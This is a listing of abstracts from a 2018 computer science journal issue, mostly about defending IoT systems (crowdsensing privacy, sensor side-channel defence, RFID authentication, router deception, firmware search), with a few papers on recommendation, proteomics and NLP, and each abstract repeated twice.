2018 Vol. 55 No. 7
2018, 55(7): 1359-1370.
DOI: 10.7544/issn1000-1239.2018.20180080
Abstract:
As a novel Internet of things (IoT) sensing mode, mobile crowdsensing provides a new way and means for ubiquitous social perception. A large number of sensing data containing sensitive and private information of sensing users is gathered in the mobile crowdsensing, and a great deal of valuable information can be mined, which greatly increases the risk of hacker attacks and private data leakage. While encouraging more sensing users to participate in sensing tasks and providing real data, how to better protect the privacy of sensing data and sensing platform has become a prominent and pressing key issue. In order to solve the above problems, this paper proposes a user-union matching scheme based on the Bloom filter. Before the sensing users upload the sensing data who can choose using the Bloom filter and the binary product of the confusion vector to estimate the similarity, and effectively protect personal privacy information. Meanwhile, aiming at the efficiency of the private set intersection of the sensing data, this study puts forward a light-weight private sensing data set intersection protocol, which can realize private sensing data intersection operation without leakage of any user’s real sensing data. Furthermore, we propose a reputation-aware incentive mechanism based on user-union matching, which can effectively control the budget expenditure on the basis of improving the processing efficiency of sensing tasks. Finally, the security analysis shows that the proposed user-union matching scheme is provably secure, and the proposed private sensing data set intersection protocol is secure, and the performance analysis and experimental results show that the proposed reputation-aware incentive mechanism is efficient and effective.
As a novel Internet of things (IoT) sensing mode, mobile crowdsensing provides a new way and means for ubiquitous social perception. A large number of sensing data containing sensitive and private information of sensing users is gathered in the mobile crowdsensing, and a great deal of valuable information can be mined, which greatly increases the risk of hacker attacks and private data leakage. While encouraging more sensing users to participate in sensing tasks and providing real data, how to better protect the privacy of sensing data and sensing platform has become a prominent and pressing key issue. In order to solve the above problems, this paper proposes a user-union matching scheme based on the Bloom filter. Before the sensing users upload the sensing data who can choose using the Bloom filter and the binary product of the confusion vector to estimate the similarity, and effectively protect personal privacy information. Meanwhile, aiming at the efficiency of the private set intersection of the sensing data, this study puts forward a light-weight private sensing data set intersection protocol, which can realize private sensing data intersection operation without leakage of any user’s real sensing data. Furthermore, we propose a reputation-aware incentive mechanism based on user-union matching, which can effectively control the budget expenditure on the basis of improving the processing efficiency of sensing tasks. Finally, the security analysis shows that the proposed user-union matching scheme is provably secure, and the proposed private sensing data set intersection protocol is secure, and the performance analysis and experimental results show that the proposed reputation-aware incentive mechanism is efficient and effective.
2018, 55(7): 1371-1392.
DOI: 10.7544/issn1000-1239.2018.20170982
Abstract:
The defensive research against Android physical sensor-based side-channel attacks mainly aims at the privacy leak which leverage mobile sensors as medium. The current defensive methods are malicious activity detection, virtual keyboards randomization, etc. However, these traditional methods can hardly protect user’s privacy from sensor-based side-channel attacks fundamentally, for the unpredictable user decision and variety of novel attacks. In order to overcome the above problems, this paper presents a defensive method against physical sensor-based side-channel attacks based on differential privacy. This defensive method interferes the process of side-channel construction by injecting random noise coincident with the Laplace distribution which can obfuscate the original sensor data. The primary challenge of the proposal method is reducing the success rate of side-channel attacks as much as possible on the premise that ensuring normal operation of the sensor-based function and user experience. Taking the advantages of a sensor-based function extraction tool SensorTainter we designed, the sensor-based functions are analyzed detailedly and classified according to the types of based sensors and algorithms, thus we estimate the ranges of sensor data obfuscation for each category of sensor-based function. By analyzing 47 144 apps and 9 typical sensor-based side-channel attacks, the experiment proves that our defensive method can effectively defense against sensor-based attacks, which results in an accuracy decrease of 27 percent points at most in one attempt during key-event side-channel attacks and about 7 percent points in tracking side-channel attacks. Because of implementing in Android framework, this defensive method is completely user transparent and has great expansibility.
The defensive research against Android physical sensor-based side-channel attacks mainly aims at the privacy leak which leverage mobile sensors as medium. The current defensive methods are malicious activity detection, virtual keyboards randomization, etc. However, these traditional methods can hardly protect user’s privacy from sensor-based side-channel attacks fundamentally, for the unpredictable user decision and variety of novel attacks. In order to overcome the above problems, this paper presents a defensive method against physical sensor-based side-channel attacks based on differential privacy. This defensive method interferes the process of side-channel construction by injecting random noise coincident with the Laplace distribution which can obfuscate the original sensor data. The primary challenge of the proposal method is reducing the success rate of side-channel attacks as much as possible on the premise that ensuring normal operation of the sensor-based function and user experience. Taking the advantages of a sensor-based function extraction tool SensorTainter we designed, the sensor-based functions are analyzed detailedly and classified according to the types of based sensors and algorithms, thus we estimate the ranges of sensor data obfuscation for each category of sensor-based function. By analyzing 47 144 apps and 9 typical sensor-based side-channel attacks, the experiment proves that our defensive method can effectively defense against sensor-based attacks, which results in an accuracy decrease of 27 percent points at most in one attempt during key-event side-channel attacks and about 7 percent points in tracking side-channel attacks. Because of implementing in Android framework, this defensive method is completely user transparent and has great expansibility.
2018, 55(7): 1393-1408.
DOI: 10.7544/issn1000-1239.2018.20170920
Abstract:
To overcome the problem that the security capabilities of the communication deteriorate significantly in the presence of eavesdropping, malicious behaviors and privacy disclosure of user platform in wireless service system of IoT, a secure transmission model among clusters is proposed based on the trusted third party. A model for trusted authentication and mechanism for the enquiry of cluster address are constructed based on the condition of discrete logarithm problem and the bilinear mapping. This model generates the temporary identity according to the Hash function and random number to achieve anonymity and only provides enquiry service to the trusted clusters authorized by control center. The suppression of Rudolph attack between user platform and coordinator is taken into consideration by setting the trusted third party in authentication mechanism. In accordance with the key agreement between source cluster and clusters in the link, certificate validation and data filling mechanism, the nested encryption and decryption and flow analysis defense are achieved to guarantee the transmission security among clusters. On this basis, the security proof of data transmission model is presented. The theoretical analysis and experimental results show that the developed model performs well in terms of eavesdropping suppression, flow analysis inhibition and anonymity protection.
To overcome the problem that the security capabilities of the communication deteriorate significantly in the presence of eavesdropping, malicious behaviors and privacy disclosure of user platform in wireless service system of IoT, a secure transmission model among clusters is proposed based on the trusted third party. A model for trusted authentication and mechanism for the enquiry of cluster address are constructed based on the condition of discrete logarithm problem and the bilinear mapping. This model generates the temporary identity according to the Hash function and random number to achieve anonymity and only provides enquiry service to the trusted clusters authorized by control center. The suppression of Rudolph attack between user platform and coordinator is taken into consideration by setting the trusted third party in authentication mechanism. In accordance with the key agreement between source cluster and clusters in the link, certificate validation and data filling mechanism, the nested encryption and decryption and flow analysis defense are achieved to guarantee the transmission security among clusters. On this basis, the security proof of data transmission model is presented. The theoretical analysis and experimental results show that the developed model performs well in terms of eavesdropping suppression, flow analysis inhibition and anonymity protection.
2018, 55(7): 1409-1420.
DOI: 10.7544/issn1000-1239.2018.20180085
Abstract:
In the transitional period, broadcasting network will cooperate with ‘cloud channel device’ to implement a unified layout and a service cloud platform. However, the opening cloud made the information security protection be hard in the broadcasting network. Attribute-based broadcast encryption technology combines the advantages of broadcast encryption and the attribute-based encryption technologies. It can securely transmit messages to multiple users and achieve flexible ciphertext access control. It is applicable to the broadcasting network which has multi-user and multi-service. However, most of the attribute-based broadcast encryption schemes up to now are not efficient enough and have many shortcomings, such as the long length of ciphertext, the big number of user private keys, the complicated calculation of encryption and decryption, and without weighted-attributes considering. In order to overcome the flaws of the attribute-based broadcast encryption schemes, the contribution of this paper is an efficient attribute-based broadcast encryption scheme for broadcasting network environment. This scheme is based on a classical broadcast encryption scheme, and the sender can choose the receiver set freely, achieving efficient user revocation. Adopt a dynamic weighted threshold access structure and introduce a wildcard mechanism which fixes the length of the broadcast ciphertext and enhance the flexibility of the ciphertext access control. The weighted attributes make the scheme more in line with the actual application environment. We incorporate a mediated attribute-based encryption to achieve outsourced storage and outsourced decryption. By this technology, we can effectively reduce the storage of private keys and computational overhead. Finally, through the security analysis and experimental simulation, we prove our scheme achieves choose plaintext attack (CPA) security safety, and has high efficiency.
In the transitional period, broadcasting network will cooperate with ‘cloud channel device’ to implement a unified layout and a service cloud platform. However, the opening cloud made the information security protection be hard in the broadcasting network. Attribute-based broadcast encryption technology combines the advantages of broadcast encryption and the attribute-based encryption technologies. It can securely transmit messages to multiple users and achieve flexible ciphertext access control. It is applicable to the broadcasting network which has multi-user and multi-service. However, most of the attribute-based broadcast encryption schemes up to now are not efficient enough and have many shortcomings, such as the long length of ciphertext, the big number of user private keys, the complicated calculation of encryption and decryption, and without weighted-attributes considering. In order to overcome the flaws of the attribute-based broadcast encryption schemes, the contribution of this paper is an efficient attribute-based broadcast encryption scheme for broadcasting network environment. This scheme is based on a classical broadcast encryption scheme, and the sender can choose the receiver set freely, achieving efficient user revocation. Adopt a dynamic weighted threshold access structure and introduce a wildcard mechanism which fixes the length of the broadcast ciphertext and enhance the flexibility of the ciphertext access control. The weighted attributes make the scheme more in line with the actual application environment. We incorporate a mediated attribute-based encryption to achieve outsourced storage and outsourced decryption. By this technology, we can effectively reduce the storage of private keys and computational overhead. Finally, through the security analysis and experimental simulation, we prove our scheme achieves choose plaintext attack (CPA) security safety, and has high efficiency.
2018, 55(7): 1421-1431.
DOI: 10.7544/issn1000-1239.2018.20180065
Abstract:
Nowadays, lots of location and time critical data has been collected by Internet of things (IoTs), such as intelligent fire control, intelligent transportation, environmental monitoring and so on. It is well known that the location and time information of these data will play an important role on some applications in IoTs. For example, the time and location information is generated in the fire alarm system, vehicle system and UAV data acquisition system. However, how to guarantee the security of these spatio-temporal data has become a challenge. One hand, the property of the data integrity should be provided; the other hand, the location and time information of the data origin should be unforgeable. This study investigates position based signatures as one of the solutions to the security of the spatio-temporal data in IoTs. Firstly, the static position based digital signature without considering time and the dynamic position based digital signature with time constraint is proposed respectively. Then, a position based digital signature protocol based on the bounded retrieval model in 3-dimension is proposed which satisfies the security requirements of dynamic conditions. Furthermore, by analyzing the security of our protocol, we conclude that the proposed protocol can resist collusion attack of the adversaries and satisfy the provable security.
Nowadays, lots of location and time critical data has been collected by Internet of things (IoTs), such as intelligent fire control, intelligent transportation, environmental monitoring and so on. It is well known that the location and time information of these data will play an important role on some applications in IoTs. For example, the time and location information is generated in the fire alarm system, vehicle system and UAV data acquisition system. However, how to guarantee the security of these spatio-temporal data has become a challenge. One hand, the property of the data integrity should be provided; the other hand, the location and time information of the data origin should be unforgeable. This study investigates position based signatures as one of the solutions to the security of the spatio-temporal data in IoTs. Firstly, the static position based digital signature without considering time and the dynamic position based digital signature with time constraint is proposed respectively. Then, a position based digital signature protocol based on the bounded retrieval model in 3-dimension is proposed which satisfies the security requirements of dynamic conditions. Furthermore, by analyzing the security of our protocol, we conclude that the proposed protocol can resist collusion attack of the adversaries and satisfy the provable security.
2018, 55(7): 1432-1439.
DOI: 10.7544/issn1000-1239.2018.20180075
Abstract:
With the increasing popularity of IoT application technologies, one of the key technologies, called the radio frequency identification (RFID) technology, has been applied to more and more application scenarios in various fields. The electronic tickets apply RFID technology to traditional tickets, which makes the traditional tickets have the characteristics of being storable and identifiable as well as verifiable, bringing a great deal of convenience and efficiency to people’s daily life. Although, RFID systems in the application of electronic tickets still face many potential security risks, such as privacy leakage. To solve the security problems in the application of electronic tickets, an ultra-lightweight RFID security authentication scheme is presented in this paper. Compared with some schemes that use complex cryptographic algorithms, this scheme adopts simple logic operation and timestamp synchronization upgrade mechanism, which can effectively resist asynchronous attack and replay attack, and besides it can effectively prevent information leakage. At the same time, the method that the time stamp matches the label information in the database in this scheme greatly improves the efficiency of information searching in database. Through the analysis of security and efficiency, and the performance comparison and simulation, the proposed scheme has higher security and efficiency than some existing schemes.
With the increasing popularity of IoT application technologies, one of the key technologies, called the radio frequency identification (RFID) technology, has been applied to more and more application scenarios in various fields. The electronic tickets apply RFID technology to traditional tickets, which makes the traditional tickets have the characteristics of being storable and identifiable as well as verifiable, bringing a great deal of convenience and efficiency to people’s daily life. Although, RFID systems in the application of electronic tickets still face many potential security risks, such as privacy leakage. To solve the security problems in the application of electronic tickets, an ultra-lightweight RFID security authentication scheme is presented in this paper. Compared with some schemes that use complex cryptographic algorithms, this scheme adopts simple logic operation and timestamp synchronization upgrade mechanism, which can effectively resist asynchronous attack and replay attack, and besides it can effectively prevent information leakage. At the same time, the method that the time stamp matches the label information in the database in this scheme greatly improves the efficiency of information searching in database. Through the analysis of security and efficiency, and the performance comparison and simulation, the proposed scheme has higher security and efficiency than some existing schemes.
2018, 55(7): 1440-1450.
DOI: 10.7544/issn1000-1239.2018.20180087
Abstract:
With the rapid development of technologies on smart mobile devices, Internet and Internet of things, wireless routers have become the first choice for home networking. However, there are so many security issues on home wireless routers that the routers and the smart devices accessing them face great security risks. On the basis of the analysis and conclusions on the hardware, firmware, configuration management and communication protocols of wireless routers, a defense method for home wireless routers based on cyber deception is proposed, which can solve part of the security problems of wireless routers. Attacks can be misleaded by adding cyber deception method into the router system. On detecting attacks over HTTP, the suspected attack traffic is directed to the shadow server, which in turn reduces the security risk of the wireless router and provides data support for further works on attack forensic analysis and attacker traceability. OWCD, the wireless router defense framework prototype system, is designed and implemented based on OpenWrt and is deployed in Phicomm K1 wireless router for testing. The experimental results show that OWCD can effectively combat attacks on wireless routers such as weak password, CSRF, command injection, etc., and thus is an effective and feasible protection method.
With the rapid development of technologies on smart mobile devices, Internet and Internet of things, wireless routers have become the first choice for home networking. However, there are so many security issues on home wireless routers that the routers and the smart devices accessing them face great security risks. On the basis of the analysis and conclusions on the hardware, firmware, configuration management and communication protocols of wireless routers, a defense method for home wireless routers based on cyber deception is proposed, which can solve part of the security problems of wireless routers. Attacks can be misleaded by adding cyber deception method into the router system. On detecting attacks over HTTP, the suspected attack traffic is directed to the shadow server, which in turn reduces the security risk of the wireless router and provides data support for further works on attack forensic analysis and attacker traceability. OWCD, the wireless router defense framework prototype system, is designed and implemented based on OpenWrt and is deployed in Phicomm K1 wireless router for testing. The experimental results show that OWCD can effectively combat attacks on wireless routers such as weak password, CSRF, command injection, etc., and thus is an effective and feasible protection method.
2018, 55(7): 1451-1461.
DOI: 10.7544/issn1000-1239.2018.20180067
Abstract:
with the rapid development of the Internet of things (IoT), IoT security issues have received widespread attention. The hardware and software features of IoT devices make them extremely vulnerable to all types of attacks. Anomaly detection of IoT devices has become a hot spot in recent years. The traditional protection methods based on intrusion detection and traffic analysis can not adapt to the hardware and software environment of IoT devices. In order to solve this problem, an anomaly detection scheme based on chip radiation is proposed. By using the electromagnetic wave signals of IoT devices radiating outwards during operation as detection basis, the original signals are extracted and selected by genetic algorithm and approximate entropy. Finally, the signal of normal behavior radiation is trained using a one-class support vector machine algorithm. The program has non-invasive features, without the need for any transformation of the original system hardware and software, applying to the existing IoT devices. The final experimental results show that compared with other commonly used anomaly detection schemes, this scheme can detect the abnormal behavior of IoT devices more effectively, with higher accuracy and lower false alarm rate.
with the rapid development of the Internet of things (IoT), IoT security issues have received widespread attention. The hardware and software features of IoT devices make them extremely vulnerable to all types of attacks. Anomaly detection of IoT devices has become a hot spot in recent years. The traditional protection methods based on intrusion detection and traffic analysis can not adapt to the hardware and software environment of IoT devices. In order to solve this problem, an anomaly detection scheme based on chip radiation is proposed. By using the electromagnetic wave signals of IoT devices radiating outwards during operation as detection basis, the original signals are extracted and selected by genetic algorithm and approximate entropy. Finally, the signal of normal behavior radiation is trained using a one-class support vector machine algorithm. The program has non-invasive features, without the need for any transformation of the original system hardware and software, applying to the existing IoT devices. The final experimental results show that compared with other commonly used anomaly detection schemes, this scheme can detect the abnormal behavior of IoT devices more effectively, with higher accuracy and lower false alarm rate.
2018, 55(7): 1462-1478.
DOI: 10.7544/issn1000-1239.2018.20180073
Abstract:
With the development of the Internet of things (IoT) technology, a new scenario emerges among various IoT networks in which different IoT networks form a large-scale, heterogeneous and dynamic distributed IoT environment. There is a need for various cooperations among devices and IoT authorities, for which it is necessary to establish a trust mechanism to promote cooperation. However, the existing researches on trust mechanism are mostly separated from the IoT environment, and do not consider the resource limitations of IoT devices as well as great differences among them in computing and storage capabilities, which results in the study of abstract trust mechanisms can not be directly applied to IoT. On the other hand, the existing researches on the issues of IoT trust rely on additional trusted third-party or inter-domain trust assumption, which is hard to be achieved in practice. In order to solve the above problems, we propose a trust management method which is suitable for distributed IoT with the help of blockchain and risk theory. Specifically, we embody the abstract concept of trust as an examination of expected credit and risk, and enable effective sharing of trust data using blockchain. Experimental simulation and analysis show that our method can quantify the trust effectively, protect the data from being tampered and have lower storage cost.
With the development of the Internet of things (IoT) technology, a new scenario emerges among various IoT networks in which different IoT networks form a large-scale, heterogeneous and dynamic distributed IoT environment. There is a need for various cooperations among devices and IoT authorities, for which it is necessary to establish a trust mechanism to promote cooperation. However, the existing researches on trust mechanism are mostly separated from the IoT environment, and do not consider the resource limitations of IoT devices as well as great differences among them in computing and storage capabilities, which results in the study of abstract trust mechanisms can not be directly applied to IoT. On the other hand, the existing researches on the issues of IoT trust rely on additional trusted third-party or inter-domain trust assumption, which is hard to be achieved in practice. In order to solve the above problems, we propose a trust management method which is suitable for distributed IoT with the help of blockchain and risk theory. Specifically, we embody the abstract concept of trust as an examination of expected credit and risk, and enable effective sharing of trust data using blockchain. Experimental simulation and analysis show that our method can quantify the trust effectively, protect the data from being tampered and have lower storage cost.
2018, 55(7): 1479-1487.
DOI: 10.7544/issn1000-1239.2018.20180056
Abstract:
In the Internet of things (IoT) cloud platform, the data is collected and used by the nodes of IoT, and the processing and storage of data is based on the cloud platform. The platform has increased the data processing and sharing abilities of IoT, meanwhile, it also has enriched the resource in cloud and improved integration of the Internet and human world. All of this offers advantage as well as new problems of information security. As the characteristic and limitation of the nodes of IoT, they are particularly vulnerable, thus it is a crucial and urgent issue that how to realize the trusted update of authorization for the hijacked nodes . In order to solve this problem, we propose a PRE based trusted update scheme of authorization for nodes on IoT cloud platform (PRE-TUAN). At first, we define the system model including the trusted IoT data server and permission management server, and the semi-trusted proxy re-encryption server in cloud. Secondly, describe the system processing and algorithms. Finally, analyze and prove the security of PRE-TUAN. PRE-TUAN is based on the proxy re-encryption (PRE), which will reach the full potential of cloud computing, and ensure the security and reliability of the data in IoT cloud.
In the Internet of things (IoT) cloud platform, the data is collected and used by the nodes of IoT, and the processing and storage of data is based on the cloud platform. The platform has increased the data processing and sharing abilities of IoT, meanwhile, it also has enriched the resource in cloud and improved integration of the Internet and human world. All of this offers advantage as well as new problems of information security. As the characteristic and limitation of the nodes of IoT, they are particularly vulnerable, thus it is a crucial and urgent issue that how to realize the trusted update of authorization for the hijacked nodes . In order to solve this problem, we propose a PRE based trusted update scheme of authorization for nodes on IoT cloud platform (PRE-TUAN). At first, we define the system model including the trusted IoT data server and permission management server, and the semi-trusted proxy re-encryption server in cloud. Secondly, describe the system processing and algorithms. Finally, analyze and prove the security of PRE-TUAN. PRE-TUAN is based on the proxy re-encryption (PRE), which will reach the full potential of cloud computing, and ensure the security and reliability of the data in IoT cloud.
2018, 55(7): 1488-1497.
DOI: 10.7544/issn1000-1239.2018.20180123
Abstract:
Data fusion is the critical process for data transmission in the Internet of things (IoT). In data fusion process, the original sensing data is processed and aggregated in the network, and only the aggregated results of data fusion are sent to the application layer, which effectively reduces the resource consumption and alleviates the workload on the sink node. Since no network node caches the aggregated data in the data fusion process, it is impossible to detect and locate the false data injection attack against data fusion results. In order to mitigate this significant vulnerability, an efficient detection scheme of false data fusion is proposed in this paper. By modeling the data fusion process, we discover and model the relationship between the input data and the fusion results, and apply the obtained model to detect abnormal data fusion results. In this way, we can mitigate malicious data fusion and optimize the IoT transmission security. In detail, we first collect input data and the relevant data fusion results for each node, and a compressed feature representation mechanism is designed to improve the data collection efficiency and reduce the resource consumption. In addition, a data fusion model based on probabilistic graph model is proposed to depict the spatial and temporal relationship between the input data and the data fusion results. Ultimately, we take the model to detect the abnormal data fusion results in an efficient way. The experimental results demonstrate that the proposed detection scheme can detect malicious data fusion operations efficiently and accurately and thus guarantee IoT transmission security.
Data fusion is the critical process for data transmission in the Internet of things (IoT). In data fusion process, the original sensing data is processed and aggregated in the network, and only the aggregated results of data fusion are sent to the application layer, which effectively reduces the resource consumption and alleviates the workload on the sink node. Since no network node caches the aggregated data in the data fusion process, it is impossible to detect and locate the false data injection attack against data fusion results. In order to mitigate this significant vulnerability, an efficient detection scheme of false data fusion is proposed in this paper. By modeling the data fusion process, we discover and model the relationship between the input data and the fusion results, and apply the obtained model to detect abnormal data fusion results. In this way, we can mitigate malicious data fusion and optimize the IoT transmission security. In detail, we first collect input data and the relevant data fusion results for each node, and a compressed feature representation mechanism is designed to improve the data collection efficiency and reduce the resource consumption. In addition, a data fusion model based on probabilistic graph model is proposed to depict the spatial and temporal relationship between the input data and the data fusion results. Ultimately, we take the model to detect the abnormal data fusion results in an efficient way. The experimental results demonstrate that the proposed detection scheme can detect malicious data fusion operations efficiently and accurately and thus guarantee IoT transmission security.
2018, 55(7): 1498-1507.
DOI: 10.7544/issn1000-1239.2018.20180078
Abstract:
Due to the extensive code reuse, homologous binaries are widely found in IoT firmwares. Once a vulnerability is found in one firmware, other firmwares sharing the similar piece of codes are at high risk. Thus, homologous binary search is of great significance to IoT firmware security analysis. However, there are still no scalable and efficient homologous binary search methods for IoT firmwares. The time complexity of the traditional method is O(N), so it is not scalable for large-scale IoT firmwares. In this paper, we design, implement, and evaluate a scalable and efficient homologous binary search scheme for IoT firmwares with time complexity O(lgN). The main idea of our methodology is encoding binary file’s readable strings by deep learning network and then generating a local sensitive Hash of the encoding vector for the fast retrieval. We compiled 893 open source components based on 16 different compile-time parameters, resulting in 71 129 pairs of labeled binary files for training and testing the network model. The results show that our method has better ROC characteristics than the traditional method. In addition, the study case shows that our method can complete one homologous binary file retrieval task for 22 594 firmware in less than 1 second.
Due to the extensive code reuse, homologous binaries are widely found in IoT firmwares. Once a vulnerability is found in one firmware, other firmwares sharing the similar piece of codes are at high risk. Thus, homologous binary search is of great significance to IoT firmware security analysis. However, there are still no scalable and efficient homologous binary search methods for IoT firmwares. The time complexity of the traditional method is O(N), so it is not scalable for large-scale IoT firmwares. In this paper, we design, implement, and evaluate a scalable and efficient homologous binary search scheme for IoT firmwares with time complexity O(lgN). The main idea of our methodology is encoding binary file’s readable strings by deep learning network and then generating a local sensitive Hash of the encoding vector for the fast retrieval. We compiled 893 open source components based on 16 different compile-time parameters, resulting in 71 129 pairs of labeled binary files for training and testing the network model. The results show that our method has better ROC characteristics than the traditional method. In addition, the study case shows that our method can complete one homologous binary file retrieval task for 22 594 firmware in less than 1 second.
2018, 55(7): 1508-1524.
DOI: 10.7544/issn1000-1239.2018.20170252
Abstract:
Recommendation system can effectively solve the personalized recommendation problem for users. As one of the most commonly used algorithm in recommendation system, collaborative filtering needs to take all the items into account, while a specific user may be only interested in the items in some certain domains. It’s more natural to make recommendation for a user via the correlated domains than the entire items, therefore, users and items can be grouped according to their interests or characteristics, and then the recommendations can be made with the user-item subgroups. Based on this idea, we propose a novel co-clustering method based on the features of users and items to find the meaningful subgroups. The proposed method includes two main modules: a feature representation model to explore the interests of the users and the characteristics of the items, and a graph model constructed in accordance with these features for coming up with the final clustering results which are used for making recommendation. In this paper, we introduce the framework of our method and give an effective solution to get the features and the clustering results. Finally, by comparing with a variety of newest algorithms on three open datasets, we verify that the proposed method can significantly improve the accuracy of recommender system.
Recommendation system can effectively solve the personalized recommendation problem for users. As one of the most commonly used algorithm in recommendation system, collaborative filtering needs to take all the items into account, while a specific user may be only interested in the items in some certain domains. It’s more natural to make recommendation for a user via the correlated domains than the entire items, therefore, users and items can be grouped according to their interests or characteristics, and then the recommendations can be made with the user-item subgroups. Based on this idea, we propose a novel co-clustering method based on the features of users and items to find the meaningful subgroups. The proposed method includes two main modules: a feature representation model to explore the interests of the users and the characteristics of the items, and a graph model constructed in accordance with these features for coming up with the final clustering results which are used for making recommendation. In this paper, we introduce the framework of our method and give an effective solution to get the features and the clustering results. Finally, by comparing with a variety of newest algorithms on three open datasets, we verify that the proposed method can significantly improve the accuracy of recommender system.
2018, 55(7): 1525-1538.
DOI: 10.7544/issn1000-1239.2018.20170080
Abstract:
Identifying proteins and their post-translational modifications are critical to the success of proteomics. Recent advances in mass spectrometry (MS) instrumentation have made it possible to generate high-resolution mass spectra of intact proteins. The existing algorithms for identifying proteins from top-down MS data are able to achieve good performance with respect to protein-spectrum matching precision and prediction accuracy of PTM locations, but their efficiencies in terms of running time are still far from satisfactory. Graphics processing unit (GPU) can be applied to parallelize large-scale replication computations and reduce the running time of serial programs. Based on compute unified device architecture (CUDA), this paper proposes an algorithm called CUDA-TP for computing alignment scores between proteins and mass spectra. Firstly, CUDA-TP uses the optimized MS-Filter algorithm to quickly filter out proteins in the database that cannot possibly attain high score for a given mass spectrum, thus only a small number of candidate proteins are obtained. Then, an AVL tree is introduced into the algorithm to speed up the computation of protein-spectrum matching. Multi-thread technique on GPU is applied to get the previous diagonal points of all nodes in the spectra grid created from mass spectra and proteins as well as the final array. Meanwhile, this algorithm utilizes target-decoy approach to control false discovery rate (FDR) of proteins and mass spectral matching results. Experimental results demonstrate that CUDA-TP can significantly accelerate protein identification such that its running time is about 10 times and 2 times faster than that of MS-TopDown and MS-Align+. To our knowledge, there are still no existing methods in the literature that can perform protein identification from top-down spectra using CUDA architecture. The source codes of the algorithm are available at https://github.com/dqiong/CUDA-TP.
Identifying proteins and their post-translational modifications are critical to the success of proteomics. Recent advances in mass spectrometry (MS) instrumentation have made it possible to generate high-resolution mass spectra of intact proteins. The existing algorithms for identifying proteins from top-down MS data are able to achieve good performance with respect to protein-spectrum matching precision and prediction accuracy of PTM locations, but their efficiencies in terms of running time are still far from satisfactory. Graphics processing unit (GPU) can be applied to parallelize large-scale replication computations and reduce the running time of serial programs. Based on compute unified device architecture (CUDA), this paper proposes an algorithm called CUDA-TP for computing alignment scores between proteins and mass spectra. Firstly, CUDA-TP uses the optimized MS-Filter algorithm to quickly filter out proteins in the database that cannot possibly attain high score for a given mass spectrum, thus only a small number of candidate proteins are obtained. Then, an AVL tree is introduced into the algorithm to speed up the computation of protein-spectrum matching. Multi-thread technique on GPU is applied to get the previous diagonal points of all nodes in the spectra grid created from mass spectra and proteins as well as the final array. Meanwhile, this algorithm utilizes target-decoy approach to control false discovery rate (FDR) of proteins and mass spectral matching results. Experimental results demonstrate that CUDA-TP can significantly accelerate protein identification such that its running time is about 10 times and 2 times faster than that of MS-TopDown and MS-Align+. To our knowledge, there are still no existing methods in the literature that can perform protein identification from top-down spectra using CUDA architecture. The source codes of the algorithm are available at https://github.com/dqiong/CUDA-TP.
2018, 55(7): 1539-1547.
DOI: 10.7544/issn1000-1239.2018.20170507
Abstract:
Question similarity calculation is a major task in community question answering (CQA). It is helpful to retrieve relevant question-answer pairs from QA community by leveraging the similarity among queries. Questions in CQA are usually composed of topics and descriptions, which are both important in the task of question similarity calculation. In addition, due to the openness of the CQA, the length of questions is different. Meanwhile, background information of the questions will interfere with the judgment on question similarity. In order to reduce the influence of the irrelevant content and the various length of questions, the keywords are extracted from the descriptions of questions. Then, the keywords are fed to the CNN-based model to extract the similar and dissimilar information between texts. At the same time, in order to make better use of the information about the question topic, the model also combines the feature from the similarity between them. In summary, the model treats the keywords and topics as the key information about the questions, and uses the information to calculate similarity between them. The model is experimented on the question similarity task of the SemEval2017. The mean average precision (MAP) reaches 49.65%, which exceeds the best result in the evaluation.
Question similarity calculation is a major task in community question answering (CQA). It is helpful to retrieve relevant question-answer pairs from QA community by leveraging the similarity among queries. Questions in CQA are usually composed of topics and descriptions, which are both important in the task of question similarity calculation. In addition, due to the openness of the CQA, the length of questions is different. Meanwhile, background information of the questions will interfere with the judgment on question similarity. In order to reduce the influence of the irrelevant content and the various length of questions, the keywords are extracted from the descriptions of questions. Then, the keywords are fed to the CNN-based model to extract the similar and dissimilar information between texts. At the same time, in order to make better use of the information about the question topic, the model also combines the feature from the similarity between them. In summary, the model treats the keywords and topics as the key information about the questions, and uses the information to calculate similarity between them. The model is experimented on the question similarity task of the SemEval2017. The mean average precision (MAP) reaches 49.65%, which exceeds the best result in the evaluation.
2018, 55(7): 1548-1556.
DOI: 10.7544/issn1000-1239.2018.20170506
Abstract:
Recognizing chemical compound and drug name from unstructured data in the field of biomedical text mining is of great significance. The current popular approaches are based on CRF model which needs large amounts of hand-crafted features, and these approaches inevitably have the tagging non-consistency problem (the same mentions in a document are tagged different labels). In this paper, we propose an attention-based BiLSTM-CRF architecture to mitigate these aforementioned drawbacks. First, word embedding is obtained from vast amounts of unlabeled biomedical text. Then the characters of current word are fed to a BiLSTM layer to learn the character representation of this word. After this, word and character representations are transformed to another BiLSTM layer and the current adjacency context representation of this word is generated. Then we use attention mechanism to obtain the current word’s context at document level on the basis of the adjacency context of all words in this document and the current word. At last, a CRF layer is used to predict the label sequence of this document according to the integration of the current adjacency context and the document-level context. Experimental results show that our method improves the consistency of mention’s label in the same document, and it can also achieve better performance (an F-score of 90.77%) than the state-of-the-art methods on the BioCreative IV CHEMDNER corpus.
Recognizing chemical compound and drug name from unstructured data in the field of biomedical text mining is of great significance. The current popular approaches are based on CRF model which needs large amounts of hand-crafted features, and these approaches inevitably have the tagging non-consistency problem (the same mentions in a document are tagged different labels). In this paper, we propose an attention-based BiLSTM-CRF architecture to mitigate these aforementioned drawbacks. First, word embedding is obtained from vast amounts of unlabeled biomedical text. Then the characters of current word are fed to a BiLSTM layer to learn the character representation of this word. After this, word and character representations are transformed to another BiLSTM layer and the current adjacency context representation of this word is generated. Then we use attention mechanism to obtain the current word’s context at document level on the basis of the adjacency context of all words in this document and the current word. At last, a CRF layer is used to predict the label sequence of this document according to the integration of the current adjacency context and the document-level context. Experimental results show that our method improves the consistency of mention’s label in the same document, and it can also achieve better performance (an F-score of 90.77%) than the state-of-the-art methods on the BioCreative IV CHEMDNER corpus.
2018, 55(7): 1557-1568.
DOI: 10.7544/issn1000-1239.2018.20160915
Abstract:
